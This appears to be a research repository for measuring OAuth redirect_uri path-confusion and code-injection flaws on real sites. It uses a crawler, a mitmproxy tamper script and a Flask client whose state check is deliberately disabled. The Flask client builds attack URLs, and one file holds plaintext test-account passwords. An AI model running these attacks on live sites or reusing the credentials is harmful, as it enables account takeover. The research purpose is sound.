├── Pathconfusion-attacklist.json
├── requirements.txt
├── convert.sh
├── merge-sites-files.py
├── dump_http.py
├── login.html
├── Idps_info.json
├── attack.html
├── idp_keywords.json
├── generate-sites-files.py
├── Smallsetofsites.json
├── launcher.py
├── facebook.py
├── Start-PathConfusion-exp.py
├── verifysites.js
├── Start-SitesVerification.py
├── tamper_http_header-path_conf.py
├── README.md
├── Pup-Crawler.js
└── idps-identification.py
/Pathconfusion-attacklist.json:
--------------------------------------------------------------------------------
1 | {"Add_and_Remove1":"/FAKEPATH/",
2 | "Add_and_Remove2":"/FAKEPATH2/"
3 | }
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | beautifulsoup4==4.12.2
2 | Requests==2.31.0
3 | selenium==4.11.2
4 | urllib3==1.26.15
5 | tldextract==3.6.0
6 | Flask-Cors==4.0.0
7 |
--------------------------------------------------------------------------------
/convert.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 |
3 | python3 generate-sites-files.py --sites $1
4 | echo "Generated single JSON files for each site."
5 |
6 | python3 merge-sites-files.py
7 | echo "Merged single JSON files into a single one."
8 |
--------------------------------------------------------------------------------
/merge-sites-files.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | __author__ = "Matteo Golinelli"
4 | __copyright__ = "Copyright (C) 2023 Matteo Golinelli"
5 | __license__ = "MIT"
6 |
7 | '''
8 | Take all the single files in the json folder
9 | and merge them into a list to dump in a single file
10 | '''
11 |
12 | import glob
13 | import json
14 |
15 | if __name__ == '__main__':
16 | json_files = glob.glob('json/*.json')
17 |
18 | data = []
19 | for json_file in json_files:
20 | with open(json_file) as f:
21 | data.append(json.load(f))
22 |
23 | with open('json/sites.json', 'w') as f:
24 | json.dump(data, f) # Note: no indentation here otherwise the file might get extremely big
25 |
--------------------------------------------------------------------------------
/dump_http.py:
--------------------------------------------------------------------------------
1 | import json
2 | import os
3 | import sys
4 |
5 |
6 |
7 | def get_headers(headers):
8 | hdrs = {}
9 |
10 | for name, value in headers:
11 | hdrs[name.decode('utf-8')] = value.decode('utf-8')
12 |
13 | return hdrs
14 |
15 | def get_content(content):
16 | if content:
17 | return content.decode('utf-8')
18 | else:
19 | return "No-Content"
20 |
21 |
22 | def response(flow):
23 | print(json.dumps({
24 | 'request': {
25 | 'timestamp_start': flow.request.timestamp_start,
26 | 'timestamp_end': flow.request.timestamp_end,
27 | 'method': flow.request.method,
28 | 'url': flow.request.url,
29 | 'headers': get_headers(flow.request.headers.fields),
30 | 'content': get_content(flow.request.content)
31 | },
32 | 'response': {
33 | 'timestamp_start': flow.response.timestamp_start,
34 | 'timestamp_end': flow.response.timestamp_end,
35 | 'status_code': flow.response.status_code,
36 | 'status_text': flow.response.reason,
37 | 'headers': get_headers(flow.response.headers.fields),
38 | 'content': get_content(flow.response.content)
39 | }
40 | })+",", file=sys.stdout)
41 |
--------------------------------------------------------------------------------
/login.html:
--------------------------------------------------------------------------------
1 |
2 |
3 | {% block title %}{% endblock %}Login with {{ provider }}
4 |
5 |
6 | Home
7 | Login with {{ provider }}
8 |
12 |
13 | Authorization request
14 |
15 |
20 |
21 |
22 |
23 |
28 |
29 |
30 |
31 |
36 |
--------------------------------------------------------------------------------
/Idps_info.json:
--------------------------------------------------------------------------------
1 | {"facebook.com":{
2 | "Username":"tommycall.text@gmail.com",
3 | "Password":"Boston2021",
4 | "Fill":{
5 | "User-Type": "ID",
6 | "Pass-Type": "ID",
7 | "Form-User": "email",
8 | "Form-Pass": "pass"
9 | },
10 | "Submit":{
11 | "Button-Type": "ID",
12 | "Button": "loginbutton"
13 | },
14 | "Grant":{
15 | "Button-Type": "QuerySelector",
16 | "Button": "div[aria-label*='ontinua']"
17 | }
18 | },
19 | "twitter.com":{
20 | "Username":"tommycall.text@gmail.com",
21 | "Password":"Boston2021",
22 | "Fill":{
23 | "User-Type":"ID",
24 | "Pass-Type":"ID",
25 | "Form-User":"username_or_email",
26 | "Form-Pass":"password"
27 | },
28 | "Submit":{
29 | "Button-Type":"ID",
30 | "Button":"allow"
31 | },
32 | "Grant":{
33 | "Button-Type":"XPath",
34 | "Button":"//div[contains(@aria-label,'ontinua')]"
35 | }
36 | },
37 | "line.me":{
38 | "Username":"tommycall.text@gmail.com",
39 | "Password":"Boston2021",
40 | "Fill":{
41 | "User-Type":"exception",
42 | "Pass-Type":"exception",
43 | "Form-User":"fill%%Name%%tid%%tommycall.text@gmail.com%%login",
44 | "Form-Pass":"fill%%Name%%tpasswd%%Boston2021%%login"
45 | },
46 | "Submit":{
47 | "Button-Type":"XPath",
48 | "Button":"//*[contains(text(), \"Log in\") or contains(@value,'Log in')]"
49 | },
50 | "Grant":{
51 | "Button-Type":"XPath",
52 | "Button":"//*[contains(text(), \"Allow\")]"
53 | }
54 | }}
--------------------------------------------------------------------------------
/attack.html:
--------------------------------------------------------------------------------
1 |
2 |
3 | {% block title %}{% endblock %}Login with {{ provider }}
4 |
5 |
6 | Home
7 | Login with {{ provider }}
8 |
9 | Code & State
10 | Code {{ code }}
11 |
12 | State {{ state }}
13 |
14 | OPP Attack URL
15 | {{ attack_URL }}
16 |
17 |
18 |
19 | Redeem request
20 |
21 |
27 |
28 |
29 |
30 |
36 |
37 |
38 |
39 |
45 |
46 |
47 |
48 |
60 |
--------------------------------------------------------------------------------
/idp_keywords.json:
--------------------------------------------------------------------------------
1 | {"atlassian.com":{"Keywords":["redirect_uri","state","client_id","response_type"],"idphostname":"bitbucket.org","Url_Prefix":["bitbucket.org/site/oauth2/authorize?","bitbucket.org/api/"]},
2 | "github.com":{"Keywords":["redirect_uri"],"idphostname":"github.com","Url_Prefix":["github.com/login/oauth/authorize?"]},
3 | "vk.com":{"Keywords":["redirect_uri"],"idphostname":"vk.com","Url_Prefix":["oauth.vk.com/authorize","api.vk.com/oauth/authorize?"]},
4 | "linkedin.com":{"Keywords":["redirect_uri","state","client_id","response_type"],"idphostname":"linkedin.com","Url_Prefix":["linkedin.com/oauth/v2/authorization?"]},
5 | "line.me":{"Keywords":["redirect_uri","state","client_id","response_type"],"idphostname":"line.me","Url_Prefix":["access.line.me/oauth2/"]},
6 | "ok.ru":{"Keywords":["redirect_uri","client_id","response_type"],"idphostname":"ok.ru","Url_Prefix":["connect.ok.ru/oauth/authorize"]},
7 | "microsoftonline.com":{"Keywords":["redirect_uri","state","client_id","response_type"],"idphostname":"microsoftonline.com","Url_Prefix":["login.microsoftonline.com/common/oauth2/"]},
8 | "live.com":{"Keywords":["redirect_uri","client_id","response_type"],"idphostname":"live.com","Url_Prefix":["login.live.com/oauth20_authorize.srf"]},
9 | "facebook.com":{"Keywords":["redirect_uri","client_id"],"idphostname":"facebook.com","Url_Prefix":["/dialog/oauth"]},
10 | "orcid.org":{"Keywords":["redirect_uri","client_id","response_type"],"idphostname":"orcid.org","Url_Prefix":["orcid.org/oauth/authorize?"]},
11 | "slack.com":{"Keywords":["redirect_uri","state","client_id"],"idphostname":"slack.com","Url_Prefix":["slack.com/oauth"]},
12 | "yandex.ru":{"Keywords":["redirect_uri","client_id","response_type"],"idphostname":"yandex.ru","Url_Prefix":["oauth.yandex.ru/authorize"]},
13 | "yahoo.com":{"Keywords":["redirect_uri","client_id","response_type"],"idphostname":"yahoo.com","Url_Prefix":["api.login.yahoo.com/oauth2/request_auth?"]},
14 | "reddit.com":{"Keywords":["redirect_uri","state","client_id","response_type"],"idphostname":"reddit.com","Url_Prefix":["/ssl.reddit.com/api/"]},
15 | "twitter.com":{"Keywords":["oauth_token"],"idphostname":"twitter.com","Url_Prefix":["api.twitter.com/oauth/authenticate"]},
16 | "kakao.com":{"Keywords":["redirect_uri","client_id","response_type"],"idphostname":"kakao.com","Url_Prefix":["kauth.kakao.com/oauth/authorize"]}
17 | }
--------------------------------------------------------------------------------
/generate-sites-files.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | __author__ = "Matteo Golinelli"
4 | __copyright__ = "Copyright (C) 2023 Matteo Golinelli"
5 | __license__ = "MIT"
6 |
7 | import argparse
8 | import logging
9 | import glob
10 | import json
11 | import csv
12 | import os
13 |
14 | '''
15 | For each site crawled, generate a JSON file with the following structure:
16 |
17 | {
18 | 'site': '',
19 | 'ranking': '',
20 | 'loginpages': [{
21 | 'loginpage': '',
22 | 'SSOs': [
23 | {
24 | 'provider': 'google',
25 | 'attributes': [{
26 | 'name': 'class',
27 | 'value': 'grid--cell s-btn s-btnicon s-btngoogle bar-md ba bc-black-100'
28 | }, {
29 | 'name': 'data-oauthserver',
30 | 'value': 'https://accounts.google.com/o/oauth2/auth'
31 | }, {
32 | 'name': 'data-oauthversion',
33 | 'value': '2.0'
34 | }, {
35 | 'name': 'data-provider',
36 | 'value': 'google'
37 | }],
38 | 'tag': 'button',
39 | 'dompath': '//html/body/div[3]/div[2]/div[1]/div[2]/button[1]'
40 | }, ...
41 | ]
42 | }, ...
43 | ]
44 | }
45 | '''
46 |
47 | if __name__ == '__main__':
48 | parser = argparse.ArgumentParser(description='Generate JSON files for each site crawled.')
49 |
50 | parser.add_argument('-s', '--sites', help='Tranco ranking csv file', required=True)
51 | parser.add_argument('-d', '--debug', action='store_true', help='Verbose output')
52 | args = parser.parse_args()
53 |
54 | if args.debug:
55 | logging.basicConfig(level=logging.DEBUG)
56 | else:
57 | logging.basicConfig(level=logging.INFO)
58 |
59 | if not os.path.exists('json'):
60 | os.makedirs('json')
61 |
62 | clean_dictionary = {
63 | 'site': '',
64 | 'ranking': '',
65 | 'loginpages': []
66 | }
67 |
68 | tranco = {}
69 |
70 | with open(args.sites, 'r') as f:
71 | reader = csv.reader(f)
72 |
73 | for row in reader:
74 | tranco[row[1]] = int(row[0])
75 |
76 | for filename in glob.glob('links/*'):
77 | with open(filename, 'r') as f:
78 | links = json.load(f)
79 |
80 | output = clean_dictionary.copy()
81 |
82 | output['site'] = links['site']
83 | output['ranking'] = str(tranco[links['site']]) if links['site'] in tranco else '-1'
84 | output['loginpages'] = []
85 | if len(links['login']) > 0:
86 | for login in links['login']:
87 | idps_loginpage = links['login'][login]
88 |
89 | loginpage = {
90 | 'loginpage': login,
91 | 'SSOs': []
92 | }
93 |
94 | for provider in idps_loginpage:
95 | data = {
96 | 'provider': provider
97 | }
98 | if 'xpath' in idps_loginpage[provider]:
99 | data['xpath'] = idps_loginpage[provider]['xpath']
100 | if 'tag' in idps_loginpage[provider]:
101 | data['tag'] = idps_loginpage[provider]['tag']
102 | if 'url' in idps_loginpage[provider]:
103 | data['url'] = idps_loginpage[provider]['url']
104 | loginpage['SSOs'].append(data)
105 |
106 | output['loginpages'].append(loginpage)
107 |
108 | with open('json/' + links['site'] + '.json', 'w') as f:
109 | json.dump(output, f, indent=4)
110 |
111 | logging.debug('Done.')
112 |
--------------------------------------------------------------------------------
/Smallsetofsites.json:
--------------------------------------------------------------------------------
1 | [{"site": "naver.com", "ranking": "98", "loginpages": [{"loginpage": "https://nid.naver.com/nidlogin.login", "SSOs": [{"provider": "facebook.com", "xpath": "//a/*[contains(text(), \"Facebook\")]", "tag": "Facebook", "url": "https://nid.naver.com/nidlogin.login"}, {"provider": "line.me", "xpath": "//a/*[contains(text(), \"Line\")]", "tag": "Line", "url": "https://nid.naver.com/oauth/global/initSNS.nhn?idp_cd=line&locale=en_US&svctype=1&postDataKey=&url=https%3A%2F%2Fwww.naver.com"}, {"provider": "facebook.com", "xpath": "//a/*[contains(text(), \"Facebook\")]", "tag": "Facebook", "url": "https://nid.naver.com/nidlogin.login"}]}]},
2 | {"site": "medium.com", "ranking": "68", "loginpages": [{"loginpage": "https://medium.com/m/signin", "SSOs": [{"provider": "twitter.com", "xpath": "//a/*[contains(text(), \"Sign in with Twitter\")]", "tag": "", "url": "https://medium.com/m/account/authenticate-twitter?state=twitter-%7Chttps%3A%2F%2Fmedium.com%2F%3Fsource%3Dlogin----------------------------------------%7Clogin&source=login----------------------------------------"},{"provider": "facebook.com", "xpath": "//a/*[contains(text(), \"Sign in with Facebook\")]", "tag": "", "url": "https://medium.com/m/connect/facebook?state=facebook-%7Chttps%3A%2F%2Fmedium.com%2F%3Fsource%3Dlogin----------------------------------------%7Clogin&source=login----------------------------------------"}]}]},
3 | {"site": "wix.com", "ranking": "127", "loginpages": [{"loginpage": "https://users.wix.com/signin?postLogin=https%3A%2F%2Fwww.wix.com%2Fmy-account%2Fsites&view=sign-up&sendEmail=true&loginCompName=Get%20Started%20F1&referralInfo=Get%20Started%20F1", "SSOs": [{"provider": "facebook.com", "xpath": "//button/*[contains(text(), \"Continue with Facebook\")]", "tag": ""}]}]}
4 | ]
--------------------------------------------------------------------------------
/launcher.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | __author__ = "Matteo Golinelli"
4 | __copyright__ = "Copyright (C) 2023 Matteo Golinelli"
5 | __license__ = "MIT"
6 |
7 | from time import sleep
8 |
9 | import subprocess
10 | import traceback
11 | import argparse
12 | import logging
13 | import random
14 | import shlex
15 | import json
16 | import sys
17 | import os
18 |
19 | MAX = 5 # Max number of processes to run at once
20 | crawler = 'idps-identification.py'
21 |
22 | # Tested sites
23 | tested = []
24 |
25 | if __name__ == '__main__':
26 | parser = argparse.ArgumentParser(prog='launcher.py', description='Launch the crawler on a list of sites')
27 |
28 | parser.add_argument('-s', '--sites',
29 | help='Sites list in csv format with two columns ', required=True)
30 | parser.add_argument('-m', '--max', default=MAX,
31 | help=f'Maximum number of sites to test concurrently (default: {MAX})')
32 | parser.add_argument('-a', '--arguments', default='',
33 | help='Additional arguments to pass to the crawler (use with = sign: -a="--arg1 --arg2")')
34 | parser.add_argument('-t', '--testall', default=False,
35 | help='Test also already tested sites', action='store_true')
36 | parser.add_argument('-c', '--crawler', default=crawler,
37 | help='Alternative crawler script name to launch')
38 | parser.add_argument('-d', '--debug', action='store_true',
39 | help='Enable debug mode')
40 |
41 | args = parser.parse_args()
42 |
43 | if args.max:
44 | MAX = int(args.max)
45 |
46 | logging.basicConfig()
47 | logger = logging.getLogger('launcher')
48 | logger.setLevel(logging.INFO)
49 | if args.debug:
50 | logger.setLevel(logging.DEBUG)
51 |
52 | # Retrieve already tested sites from tested.json file
53 | if not args.testall and os.path.exists(f'logs/tested.json'):
54 | with open(f'logs/tested.json', 'r') as f:
55 | tested = json.load(f)
56 |
57 | if len(tested) > 0:
58 | random.shuffle(tested)
59 | logger.info(f'Already tested sites ({len(tested)}): {", ".join(tested[:min(len(tested), 10)])}' +
60 | f'... and {len(tested) - min(len(tested), 10)} more')
61 |
62 | denylist = ['google', 'facebook', 'amazon', 'twitter', '.gov', 'acm.com', 'jstor.org', 'arxiv']
63 |
64 | sites = []
65 | try:
66 | with open(args.sites, 'r') as f:
67 | sites = [s.strip() for s in f.readlines()]
68 |
69 | random.shuffle(sites)
70 |
71 | processes = {}
72 |
73 | for site in sites:
74 | if any(i in site for i in denylist):
75 | continue
76 | try:
77 | rank = int(site.strip().split(',')[0])
78 | site = site.strip().split(',')[1]
79 |
80 | first = True # Execute the loop the first time regardless
81 | # Loop until we have less than MAX processes running
82 | while len(processes) >= MAX or first:
83 | first = False
84 |
85 | for s in processes.keys():
86 | state = processes[s].poll()
87 |
88 | if state is not None: # Process has finished
89 | del processes[s]
90 | logger.info(f'[{len(tested)}/{len(sites)} ({len(tested)/len(sites)*100:.2f}%)] {s} tested, exit-code: {state}.')
91 | if state == 0:
92 | tested.append(s)
93 | with open(f'logs/tested.json', 'w') as f:
94 | json.dump(tested, f)
95 | break
96 | sleep(1)
97 |
98 | if site in tested and not args.testall:
99 | continue
100 |
101 | # When we have less than MAX processes running, launch a new one
102 | if site != '' and site not in tested:
103 | cmd = f'python3 {args.crawler} -t {site} {args.arguments}'
104 | logger.info(f'Testing {site}')
105 | try:
106 | p = subprocess.Popen(shlex.split(cmd))
107 | processes[site] = p
108 |
109 | #p = subprocess.Popen(shlex.split('python3 sleep-print.py ' + site))
110 | #processes[site] = p
111 |
112 | print('\t\t >>>', cmd)
113 | except subprocess.TimeoutExpired as e:
114 | logger.error(f'Timeout expired for {site}')
115 | except subprocess.CalledProcessError as e:
116 | logger.error(f'Could not test site {site}')
117 | except Exception as e:
118 | logger.error(f'Could not test site {site}')
119 | traceback.print_exc()
120 | except Exception as e:
121 | logger.error(f'Error [{site}] {e}')
122 | traceback.print_exc()
123 | except KeyboardInterrupt:
124 | logger.error('Keyboard interrupt')
125 | except:
126 | logger.error(traceback.format_exc())
127 | finally:
128 | logger.info(f'Tested sites ({len(tested)}): {", ".join(tested[:min(len(tested), 10)])}' +
129 | f'... and {len(tested) - min(len(tested), 10)} more')
130 | with open(f'logs/tested.json', 'w') as f:
131 | json.dump(tested, f)
132 |
--------------------------------------------------------------------------------
/facebook.py:
--------------------------------------------------------------------------------
1 | from flask import Flask, Response, request, make_response, redirect, render_template, jsonify
2 | from flask import session as login_session
3 | from flask_cors import CORS
4 |
5 | from urllib.parse import urlparse, urlunparse
6 | import requests
7 | import random
8 | import string
9 | import json
10 |
11 | app = Flask(__name__)
12 | CORS(app)
13 |
14 | DO_NOT_CHECK_STATE = True
15 |
16 | ngrok = 'https://4406-2-37-67-76.ngrok.io'
17 | authorization_base_url = 'https://www.facebook.com/v16.0/dialog/oauth'
18 | token_url = 'https://graph.facebook.com/v16.0/oauth/access_token'
19 | request_url = 'https://graph.facebook.com/v16.0/me'
20 | redirect_uri = f'{ngrok}/login/oauth/authorize'
21 |
22 | client_id = '937387930629121'
23 | client_secret = 'REDACTED'
24 | scope = 'email'
25 | inject_code = '1234567890'
26 |
27 | # Login page
28 | @app.route('/', methods=['GET'])
29 | def show_login():
30 | """
31 | Show the login page and create the random state parameter.
32 | If the user is authenticated, redirect to the main page.
33 | """
34 | print(f'show_login(), session: {login_session}')
35 | if 'access_token' in login_session:
36 | return redirect('/index')
37 | state = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(32))
38 | login_session['state'] = state
39 | #return jsonify(state=state)
40 | return render_template('login.html', state=state, provider='Facebook')
41 |
42 | # 1. Send initial request to get permissions from the user
43 | @app.route('/handleLogin', methods=["GET"])
44 | def handleLogin():
45 | '''
46 | Make the first request to get authorization from the user.
47 | '''
48 | # Check if there's a passed callback URL
49 | if 'callback' in request.args:
50 | if request.args.get('callback').startswith('/'):
51 | _redirect_uri = redirect_uri + request.args.get('callback')[1:]
52 | else:
53 | _redirect_uri = redirect_uri + request.args.get('callback')
54 | else:
55 | _redirect_uri = redirect_uri
56 |
57 | # Check that the state parameter is valid
58 | if DO_NOT_CHECK_STATE or login_session['state'] == request.args.get('state'):
59 | # Get the authorization code
60 | url = f'{authorization_base_url}?client_id={client_id}&state={login_session["state"]}' + \
61 | f'&scope={scope}' + \
62 | f'&response_type=code' + \
63 | f'&redirect_uri={_redirect_uri}'
64 | return redirect(url)
65 | else:
66 | return jsonify(invalid_state_token="invalid_state_token")
67 |
68 | # 1. Redeem tests: send authorization request
69 | @app.route('/authorize', methods=["GET"])
70 | def authorize():
71 | '''
72 | Make the first request to get authorization from the user.
73 | '''
74 | if 'test' in request.args:
75 | test = request.args.get('test')
76 | else:
77 | test = 'genuine'
78 |
79 | _redirect_uri = ''
80 | if test == 'genuine':
81 | _redirect_uri = f'{redirect_uri}'
82 |
83 | elif test == 'code_injection':
84 | _redirect_uri = f'{redirect_uri}%3Fcode%3D{inject_code}'
85 |
86 | elif test == 'code_injection_path_confusion':
87 | _redirect_uri = f'{redirect_uri}/FAKEPATH'
88 |
89 | # Get the authorization code
90 | url = f'{authorization_base_url}?client_id={client_id}&state={login_session["state"]}' + \
91 | f'&response_type=code' + \
92 | f'&scope={scope}' + \
93 | f'&redirect_uri={_redirect_uri}'
94 | return redirect(url)
95 |
96 | # /login/oauth/authorize
97 | #2. Using the /callback route to handle authentication
98 | @app.route('/login/oauth/authorize', methods=['GET', 'POST'])
99 | def handle_callback_login():
100 | if DO_NOT_CHECK_STATE or login_session['state'] == request.args.get('state'):
101 | if 'state' not in login_session:
102 | return render_template(
103 | 'attack.html', attack_URL='',
104 | provider='Facebook',
105 | code=request.args.get('code'),
106 | state=request.args.get('state')
107 | )
108 | if 'code' in request.args:
109 | # Create an attack URL to redirect the user to by injecting the received code into the redirect_URI
110 | _redirect_uri = f'{redirect_uri}%3Fcode%3D{request.args.get("code")}'
111 | url = f'{authorization_base_url}?client_id={client_id}&state={login_session["state"]}' + \
112 | f'&response_type=code' + \
113 | f'&scope={scope}' + \
114 | f'&redirect_uri={_redirect_uri}'
115 | return render_template(
116 | 'attack.html', attack_URL=url,
117 | provider='Facebook',
118 | code=request.args.get('code'),
119 | state=request.args.get('state')
120 | )
121 | else:
122 | return jsonify(error="404_no_code"), 404
123 | else:
124 | return jsonify(invalid_state_token="invalid_state_token")
125 |
126 | @app.route('/redeem', methods=['GET'])
127 | def redeem():
128 | '''
129 | Redeem the authorization code for an access token.
130 | '''
131 | if 'code' in request.args:
132 | if 'test' in request.args:
133 | test = request.args.get('test')
134 | else:
135 | test = 'genuine'
136 |
137 | _redirect_uri = ''
138 | if test == 'genuine':
139 | _redirect_uri = f'{redirect_uri}'
140 |
141 | elif test == 'code_injection':
142 | _redirect_uri = f'{redirect_uri}%3Fcode%3D{inject_code}'
143 |
144 | elif test == 'code_injection_path_confusion':
145 | _redirect_uri = f'{redirect_uri}/FAKEPATH'
146 |
147 | # Redeem the authorization code for an access token
148 | url = f'{token_url}?' + \
149 | f'client_id={client_id}&client_secret={client_secret}' + \
150 | f'&code={request.args.get("code")}' + \
151 | f'&redirect_uri={_redirect_uri}' + \
152 | f'&grant_type=authorization_code'
153 | r = requests.get(url)
154 |
155 | print(f'redeem: {url}')
156 |
157 | try:
158 | return jsonify(r.json())
159 | except AttributeError:
160 | app.logger.debug('error redeeming the code')
161 | return jsonify(response=r.text), 500
162 | else:
163 | return jsonify(error="404_no_code"), 404
164 |
165 | # 3. Get user information from GitHub
166 | @app.route('/index')
167 | def index():
168 | print(f'index, session: {login_session}')
169 | # Check for access_token in session
170 | if 'access_token' not in login_session:
171 | return 'You are not authenticated', 404
172 |
173 | # Retrieve user information from the API
174 | url = request_url
175 | r = requests.get(url,
176 | params={
177 | 'access_token': login_session['access_token'],
178 | 'client_id': client_id,
179 | 'client_secret': client_secret,
180 | 'redirect_uri': redirect_uri
181 | })
182 | try:
183 | response = r.json()
184 | return jsonify(response=response)
185 |
186 | except AttributeError:
187 | app.logger.debug('error getting the information')
188 | return "Error retrieving the information", 500
189 |
190 | @app.errorhandler(404)
191 | def page_not_found(e):
192 | return jsonify(request.args), 404
193 | # if 'error' in request.args and 'redirect_uri_mismatch' in request.args.get('error'):
194 | # return jsonify(request.args)
195 | # else:
196 |
197 | if __name__ == '__main__':
198 | app.secret_key = 'super_secret_key'
199 | app.run(debug=True, port=8081)
200 |
--------------------------------------------------------------------------------
/Start-PathConfusion-exp.py:
--------------------------------------------------------------------------------
1 | import subprocess
2 | from subprocess import PIPE
3 | from subprocess import TimeoutExpired
4 | import urllib.parse
5 | import re,time,json,os,sys
6 | import hashlib
7 |
8 |
9 | def Identify_SSO_idp(idp,SSO):
10 | sso=[]
11 | for i in SSO:
12 | if i["provider"]==idp:
13 | sso.append(i)
14 | return sso
15 |
16 |
17 | if __name__ == "__main__":
18 | #input experiment:Login pages, IDP to test,output folder
19 | sites = json.load(open(sys.argv[1],'r'))
20 | outputfolder=sys.argv[2]
21 | Pathconf=json.load(open(sys.argv[3]))
22 | keyword_Pathconf=json.load(open(sys.argv[4]))
23 | Idp_info=json.load(open(sys.argv[5]))
24 | measurement= "pathconfusion-fixsitesaddremove3"
25 |
26 | #for each site obatin SSO and modify it,run MITM proxy,Run login crawler.
27 |
28 | Site_analyzed=[]
29 | restart=False
30 | start_time = time.time()
31 | #Path output result
32 | main_path=outputfolder
33 | if not os.path.exists(main_path):
34 | os.makedirs(main_path)
35 | else:
36 | print("directory alredy present do not override")
37 |
38 | #for each pathc conf
39 | for p in Pathconf:
40 | print(f'start analyze pathconfusion:{Pathconf[p]}')
41 | #Path output pathconfusion
42 | gen_path=main_path+"/"+p
43 | if not os.path.exists(gen_path):
44 | os.makedirs(gen_path)
45 | else:
46 | print("directory alredy present do not override")
47 |
48 | Site_analyzed=[]
49 | fractionate=0
50 | for site in sites:
51 | if(not site['loginpages']):
52 | print(f'Site{site["site"]} without login pages')
53 | continue
54 | #use to space measurement
55 | fractionate+=1
56 | for l in site['loginpages']:
57 | #no SSO move to next login page
58 | if(len(l["SSOs"])==0):continue
59 | print(f'Test path confusion {p} for idp:{l["SSOs"][0]["provider"]} on site: {site["site"]}')
60 |
61 | accIdP=[]
62 | for k in l["SSOs"]:
63 | if(k["provider"]not in accIdP):
64 | accIdP.append(k["provider"])
65 |
66 | Idp_sso=[]
67 | for a in accIdP:
68 | Idp_sso.extend(Identify_SSO_idp(a,l["SSOs"]))
69 |
70 | if(Idp_sso==[]):continue
71 | for s in Idp_sso:
72 | refineidp=s["provider"]
73 | Idp=refineidp
74 | commands=[]
75 | pagehash=hashlib.md5((l["loginpage"]+s["xpath"]).encode('utf-8')).hexdigest()
76 | namefile=str(site["site"])+"-"+str(s["provider"])+"-"+str(pagehash)
77 |
78 | if(s["provider"]not in Idp_info.keys()):
79 | print(f'Provider {s["provider"]} not included skipß it')
80 | with open(gen_path+"/"+namefile+"-crawlerlog.txt", 'w') as f:
81 | f.write("IDP not implemented!!!\nRESULT-EXPERIMENT:-1")
82 | continue
83 |
84 | if(s["provider"]not in keyword_Pathconf.keys()):
85 | print(f'Provider {s["provider"]} not included in idps keywords skip it')
86 | with open(gen_path+"/"+namefile+"-crawlerlog.txt", 'w') as f:
87 | f.write("Keywords of IDP not present!!!\nRESULT-EXPERIMENT:-1")
88 | continue
89 |
90 | print(f'Testing site:{site["site"]} idp:{s["provider"]} and path confusion:{Pathconf[p]} in login page: {l["loginpage"]}')
91 | Site_analyzed.append(namefile)
92 |
93 | #build string for mitmproxy
94 | cmd=["mitmdump","--set","listen_port=7777",
95 | "--set","http2=false",
96 | "-s","tamper_http_header-path_conf.py"]
97 |
98 | stream="save_stream_file="+namefile+"-stream"
99 | cmd.append("--set")
100 | cmd.append(stream)
101 |
102 | Idp_keywords=keyword_Pathconf[refineidp]["Keywords"]
103 | Idp_url_prefix=keyword_Pathconf[refineidp]["Url_Prefix"]
104 |
105 |
106 | for k in range(len(Idp_keywords)):
107 | cmd.append("--set")
108 | cmd.append("keywords"+str(k)+"="+str(Idp_keywords[k]))
109 | cmd.append("--set")
110 | cmd.append("inject="+str(Pathconf[p]))
111 | for r in range(len(Idp_url_prefix)):
112 | cmd.append("--set")
113 | cmd.append("linkprefix"+str(r)+"="+str(Idp_url_prefix[r]))
114 |
115 | cmd.append("--set")
116 | cmd.append("idphostname="+str(keyword_Pathconf[refineidp]["idphostname"]))
117 |
118 | print(cmd)
119 | #save command
120 | commands.append("command for proxy:")
121 | commands.append(cmd)
122 |
123 | #start proxy
124 | Proxy_subproc = subprocess.Popen(cmd, stdout=subprocess.PIPE,universal_newlines=True)
125 | print("proxy started")
126 |
127 | time.sleep(2)
128 | #build parameter file for crawler
129 | paramfile="paramfile.json"
130 | paramters={
131 | "site":l["loginpage"],
132 | "idp": Idp,
133 | "measurement": measurement,
134 | "idp_info":Idp_info[Idp],
135 | "xpath":s["xpath"],
136 | "name":namefile,
137 | "outpath":gen_path+"/"
138 | }
139 |
140 | #save params
141 | commands.append("parameters for crawler:")
142 | commands.append(paramters)
143 |
144 | with open(paramfile, 'w') as f:
145 | json.dump(paramters,f)
146 |
147 | #parameter file
148 | cmd=["node","Pup-Crawler.js"]
149 | cmd.append("--parameters="+paramfile)
150 |
151 | #save command
152 | commands.append("command for crawler:")
153 | commands.append(cmd)
154 | #save command used for the experiment
155 | with open(namefile+"-commands.txt", 'w') as f:
156 | for c in commands:
157 | f.write(str(c))
158 | f.write('\n')
159 |
160 | #wait to let proxy be ready
161 | time.sleep(2)
162 |
163 | #start crawler
164 | Crawler_subproc = subprocess.Popen(cmd, stdout=subprocess.PIPE,universal_newlines=True)
165 | print("crawler started")
166 |
167 | #wait the crawler to terminate and get return code
168 | try:
169 | crawlresult=Crawler_subproc.wait(timeout=120 )
170 | except TimeoutExpired:
171 | print("crawler blocked kill it and go ahead")
172 | crawlresult=Crawler_subproc.kill()
173 | print(f'print result crawler:{crawlresult}')
174 | outs=Crawler_subproc.stdout
175 | buff=outs.read()
176 | print(f'output of crawler:{buff}')
177 | #save crawler output
178 | with open(namefile+"-crawlerlog.txt", 'w') as f:
179 | f.write(buff)
180 |
181 | time.sleep(2)
182 | proxyresult = Proxy_subproc.terminate()
183 | print(f'print result PROXY:{proxyresult}')
184 | #obtain proxy log
185 | outs=Proxy_subproc.stdout
186 | buff=outs.read()
187 | print(f'output proxy:{buff}')
188 |
189 | #save mitm files
190 | with open(namefile+"-proxylog.txt", 'w') as f:
191 | f.write(buff)
192 |
193 | #move file to experiment folder
194 | try:
195 | os.rename(namefile+"-crawlerlog.txt", gen_path+"/"+namefile+"-crawlerlog.txt")
196 | os.rename(namefile+"-proxylog.txt", gen_path+"/"+namefile+"-proxylog.txt")
197 | os.rename(namefile+"-stream", gen_path+"/"+namefile+"-stream")
198 | os.rename(namefile+"-commands.txt", gen_path+"/"+namefile+"-commands.txt")
199 | except Exception as e:
200 | print(f'exception with this measurement go ahead!!!')
201 |
202 |
203 | print("browser and proxy ready for next measurement")
204 | #time.sleep(90)
205 | time.sleep(30)
206 |
207 | #change this to modify fraction of site of each stint
208 | if(fractionate%35==0):
209 | #save snapshot of sites analyzed and wait for next trance of sites to analyze
210 | print("save temporary snapshot sites analyzed")
